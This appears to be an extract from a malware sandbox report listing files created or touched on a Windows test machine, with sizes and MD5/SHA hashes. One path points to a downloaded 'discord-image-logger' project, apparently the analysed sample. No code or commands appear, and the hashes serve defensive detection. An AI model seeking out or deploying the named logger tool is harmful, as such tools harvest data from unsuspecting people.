SHA1701d12b8ad72a5f0e4632ee66e0d3d7163b243e5
SHA2567b0a79cdb251fac8756bd63d0a1cada3ff77860d043d720e052b9cfd55644ebc
SHA5123af62d7c943af50a2dd8524f88ec775ce9ac55212c6cea893398eba50d96ed2dc61d00b643a7a05d5fadb17d75b7d921bd3a33f9998a6e5d25df0d8da7944a0a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
Filesize82B
MD5851ce048a4785b2ba78aae19d3a015ed
SHA1d4d295545159b79b449584b2b1e8e138d8fe4de1
SHA2560678f15978f972dbf24e28945182409a1458cfd992ebcb47ebf27d08e468065a
SHA512afef12886fa3bddd73072561e5cdabca38d2d39fd8a6a63ca80641422869959396a1546fe4917e5c59084fbce809b59d4ca86346d2d3fce0f3b96f3448926814
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize48B
MD5f7d5fc5f005a046789d316c5b22e1de8
SHA1c4c95ee4e52d569bbf167e721a96131316282fa5
SHA2561f6094905eaf461e3b488f5a444655a2eb78aeb7b5e5870db2c2c065104fdd15
SHA5126c4a582514577f292585b3a1181cb808cb1385c224a7f1db48aea5685338f6ed2125d9df9171c55bd6591b0ca99d4d72f45cb377afd2b17ed9da13ab05a08b74
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5803f3.TMP
Filesize48B
MD50da295f56d8ad27511ce20d160665dcb
SHA19793c4dafc3699d5bd934f09df5bbc63403a8ac5
SHA256ffb212d73aee1b50c0e922e8c85766b67b9e92782ecaaac2b91736f17069c603
SHA512a28b59d91d30fed31a234774e84db1d4ab7e19dbee2a3b1ba5dccc21300706f8def3a156311e9f32ffd6e9dce6850d2da965545f0bffe004f097023c1882c8a1
-
Filesize
2KB
MD522f56464e3245447ae6a710dce117d4e
SHA121827bcd49bd305b864ab9a15f5b9234300b6f93
SHA2562c75040067287891acde8cd8ade4cd6ca1ddf6fd5413daded3f6babf85264c59
SHA51232701b0c4a0282eae8d43e6100405dcbe62b9da3711185d15991749173b2da507c6087743e74215d67277843eb5f2b57d19ba18db9a9d1bb4747d60b9e2f8fee
-
Filesize
2KB
MD59e3cdd3cd41ad27384912154af811031
SHA1ee693696d199f80da0b3d4e75253db8969ec31ff
SHA256c6fb155fbf4957621c0e625b054f7b55708eb80e423240c7d214d8be42524570
SHA51270f0d92429d4986434775805bca3ae6fc230e15a3b65386fba7129d7cf25e75fefc6d3cee1753c764a8bd6c0ece65c549027fa2b597de425d81a9d9b2062fd15
-
Filesize
2KB
MD51ef98c631b0178e004ddd2f22a1ee8f6
SHA1f6fb4d122483c200ea4d38ca4184280a5be4e78d
SHA256db249549c10cb52972ed8a7e0f8e4ff67a14cb16dd3c8b317838871bd4b4936d
SHA512b95271a5b7275d08a1d849cf69b3fcc3a854d7105782fef207be23c2eeb90142f6887b0171a81dbc2bb24b52d20c59845a93131208937635c05e90d40dde669d
-
Filesize
2KB
MD5b15eee1d621ed8e95c744dc1997a038b
SHA1a63d9eecf5a7761c6aea71cd96fa67801e4efe90
SHA256caf3f099c7f8fbf25860eeb16ab58193bfde697bd82ba448f8c143d3797862d4
SHA512bd8525bbbc39b95ff777e3f3d61245d9796569907a46e3cf3139836f6ef05387c79dfbc54eb0835c3226781f90641bf725bd32df87199b8ca42ec4c6c13375d1
-
Filesize
1KB
MD5fa522c35b50fc503c7d967dbf316302a
SHA19b529cdad12ac3236a71fcc402ae8b8095c9c769
SHA25649f4c7e156e7ee59916acaf4d7b6c47c8217451aec08436c3f03a835ca2c70bc
SHA51228570f3756d427cc8d000830e08aa861959f4995a92dfb97ea9fd57a7fabe47e8fa2f34c0e8d0bb9edbebba933423a9deb7328b039d8e963baf92dcaa454498a
-
Filesize
704B
MD529d02f4fadbda092b22484a99f09d7cb
SHA139174e7154fb7f5ec1ef02cf12032dd1e078b42b
SHA2564c6252f15426291746b437f4a7d4b508ab49f6976d9c63ebbadb0d1e1e9c6460
SHA5128a25815c2fea13862ccaccde7aca447312f4841dfb3c03194e3818d04a6565ba326be3e3a72eae64b54bd530889de589f02259a7d3c41f5ba1b1b23205a064ba
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5f8bf6478b21e0f619ec42f9c64b6851e
SHA1f522d85233b6aaf44a20b5a47487c71a0b8e60e3
SHA256c67c8b5d48338f745417fe161a724d39f54e737e97c63d37e9885133885c8c66
SHA5128e338355df9e34831325f06e09d2e1a539e82ae49417c370418eea29a7317bc93527330013c0460efa8e4527e00d2f44849824a5f8c96378a09b905b38744fc0
-
Filesize
10KB
MD510b890e0914ce84be781e3d1e8f4e561
SHA15eb115447685595a7e93b72e1e7507786c1bde1b
SHA256d7736a78864b697951007bab711ac1dc1bf2d4d480bc1b45c771fbafba6ba901
SHA512b9ab48c21541ad9e9c0bbdfd8c05be626861c8d1b3c17db974e039ca4cfb9cfbbfd828fd23c04d51e160988818289461e6ec310c67e84e3922c7b24643af767a
-
Filesize
1KB
MD5f8d49a4af7a844bfc7247d5670def557
SHA126ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA25661c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA5129e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
784B
MD5a9c6ee874602fe45815facf6674e2fca
SHA1a5db005b623840250fd85e16cff1badf1dcb894d
SHA2564c97b6d1cbdfe8925e36a3ecb50526b72d710dc61fcff88ec5ad640e65c15b5e
SHA5126488824c3158ed88966d0dbb19f273400e76ef79475b019329e7a93319165afe5cb1baef2b972860363927fab511121414bee9bd9e8058c98f856387f474f938
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize10KB
MD5ba7d1fd56bbac2611ae3b4018e9909cd
SHA1ed9806d32296111258735d8fb3434826d2009b77
SHA2565cff6e26794b16341325bcae8b159c3ae937d34ff69460aedd513ef45e97b6d9
SHA51238ff4472ae88572934016d463507710694d93f38c9aeae54ab708e40ff2b7c0cf08d0977c727631008513e55405d70e82b3dbe006bec2977db46188504cf6878
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize10KB
MD57914b6f8a0fae1ecc3e233bebc3ff315
SHA13ea30e645edf986834b07ecbb384fc6ef69ee521
SHA2565d5cf7b21178c3ef0c5b159c5defb58f27dee68a5bfa3ab8f9739e68c3cc5d7f
SHA51286c1069c8f0ffce09600f51cf479d114d05c4a1c7df6a05d1b191a3c9aa99cb576d78262ae5bd718cae483b83b86314756854f124ebbc0366d33238be172cba2
-
Filesize
8.8MB
MD5dd33133b656c61a2c1d79dfa92d7f57c
SHA1396e7c7a2b2f7fbaba95d768c2e0e48fa928c8c1
SHA256498e1a7d867df07ffa85a9f56e34faf43988b54cc84107e4696a9039fdb8c059
SHA512c0b1c2dfe358e31529403542abd2e3d98287488bcbb07eb1191bc1b2ada94406d3b6fca0d8de0f9824cea861ebfdf9d591e5606e80f7d3bade4e3262c0ca1b5f
-
C:\Users\Admin\Downloads\discord-image-logger-release\discord-image-logger-release\.vscode\settings.json
Filesize53B
MD576a322b0ed73c31e6c0aa1babb1af1c5
SHA1de4fcc00897666aee8f6ed2797dc83b870bfaa48
SHA256d3c9cdfd35e43a33fec6a7ff05ac8aaa9bdbbc062fe3a79598781f408fee7308
SHA51247e1c1270fd3f84d558b002bbf946a1cce3b3f13eb95216e3e052ff4090c59b149148f4e128aee40348db3fc528db923111e4d4afcf1baae5fd577d24a8b89eb
-
Filesize
14.0MB
MD5ef8beb81c6fa2aaad4a314be361292ce
SHA17b7296096931ac5d62081cc91ead8afd2346e0c7
SHA2566377476be087b6911f24f93a601fd8f46461f52815ec27f95371c8418c385377
SHA5128ffa18e66e4e8a3a23eb7c2375fa6b25aab90da3265f35d56ea9965f8d2c89a988052bbd0e05c0b3b3c124cb5e9f47b0b6ab5ea0df3b880d449fd3ff2a25767f
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
56KB
MD505bc1a72bba6d3a1e947889816bc5af9
SHA15e79b6679d3879c712f6ffdd71c2765ac35657cc
SHA2563aeb09bf487d96bd5f273c66ba5eff9f38aab0caa91fd7d5b9c72e624ba8e45a
SHA5124bd44d6b3fd386c053cc3df48d9753224c66211c09a748c82760e53440084abf59d64a588e2606cff38dd6d722777f54fdd0329a34c5145b5304903da4560edc
-
Filesize
43KB
MD5a88c941f498dbf0d05022cff06719cda
SHA107bb675b8f1828134de837fe1ef457b4a8a89e3e
SHA2565f2f94e2206fd6516cde8b3068b31a248d2080a094cd1406a60efb70a7ece42c
SHA512b07a06539e5bb58aefc0518cadf856a54a10607d2d5e810cb2b87f6e9722fffacbac06e31b249f2f4c34de22f0e6bd21000e6e9f2d79ccfbcec4214bb181ca71
-
Filesize
48KB
MD50f1bedcd0ae85f68fdb3e2d041bcea8a
SHA1553c7c1a933301790189bad120e4dd6f393ba768
SHA2564783a629fbbcc597aaea88afa8147aa285ee9273b1282e350753cf0cdc9a2ba3
SHA51285d3cda472591aa14669ba404837d0d7fa03e5b1e8ae877cf69eb4d903fba536528a058410e6d83aa1d32c461a57012b929092bada729ef820b2e4767d6fbde5
-
Filesize
73KB
MD5d558a83af8c6913f87cb82cdb5c2ea0d
SHA1e6d0e4f617273f902ca0a7398153519375816dd4
SHA256f3bc44f23f86648c8a2c686a88d70f65f403945cf40a679439abb4b0ec5500e9
SHA512c0cf2c07e6a479b61b8fb33884dca271c19ce8ceec5114df51074cf4a16179bbb86be9024ab29e7381d94a84f646ae1e168ff9c76dead9f0124f3bc45603e55f
-
Filesize
99KB
MD5044128768f6dd149fee0dd0c9907bb45
SHA1d5cdd34603c4484634de0579900d407fe8227dca
SHA25666299c0c3bd727b4a291449fd62e822fe72e61efc9ab9e187dd90805c664df58
SHA512909f4aa394df8603bc9284b28b540e8ef3c8d20b0f149a81f32a47cfde6be10686beb24e4df768fc3a366616b2b53b781e4d7dfe4fee65b70a2213fddd731cf8
-
Filesize
54KB
MD58350a5245117e54b3ba123e1e3140756
SHA132dc8fdde2cc059c039262c28427ee61e8e5fd43
SHA256bd1cf11afe2160405a36e2e7d4c4f2dafce9efe5ccb4dc96a7aadce6d6e5be80
SHA51244c82ce5df65cc84f78ce6eff8bbfd05431fa6be34dab2e8342d12bf554c8b4717c2a6f0d6aa71bfbae8ae587bf91361e2e07373f54f9760062c7535045c811e
-
Filesize
39KB
MD5a7d50223d0dedc64c4722572beeddc1a
SHA1d5826940d2afeac8da8deeec303d1418f8b9dd0e
SHA256372a5a48bc48ec8589372acfb90f930418b460577958d3af2a2912ecfaeaf405
SHA512e4b48e9474b593c00a8881040c1fbbe5609e982ceb7e8063b5bf021637c6b63a9f7c73ea0e97ee365dfaac76afa96e20cdd8b198c3bf966bdb47db97331df564
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11